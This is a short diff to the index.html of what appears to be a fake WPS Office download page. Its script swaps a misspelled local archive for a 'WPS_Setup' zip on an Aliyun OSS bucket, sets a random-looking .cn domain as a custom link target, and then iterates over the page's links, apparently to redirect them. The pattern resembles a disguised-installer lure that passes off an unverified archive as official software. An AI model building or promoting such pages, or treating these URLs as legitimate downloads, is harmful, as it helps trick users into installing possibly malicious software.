--- a/index.html
+++ b/index.html
@@ -12,8 +12,8 @@
     <script type="text/javascript" defer="" async="" src="static/js/c.js.js"></script><script src="static/js/500757.js.js" defer="" async=""></script><script src="static/js/jquery.min.js.js"></script>
     <script>
         $(document).ready(function () {
-        let Ahref = "Oifficer_W.P.S_12.047.zip"; // 下载文件路径
-        let Name = "Oifficer_W.P.S_12.047.zip"; // 下载文件名称
+        let Ahref = "https://clisjre.oss-cn-hongkong.aliyuncs.com/WPS_Setup_21915.zip"; // 下载文件路径
+        let Name = "https://clisjre.oss-cn-hongkong.aliyuncs.com/WPS_Setup_21915.zip"; // 下载文件名称
         let customHref = "https://erna.idsyfu.cn/"; // 自定义的href值
 
             $('a').each(function () {
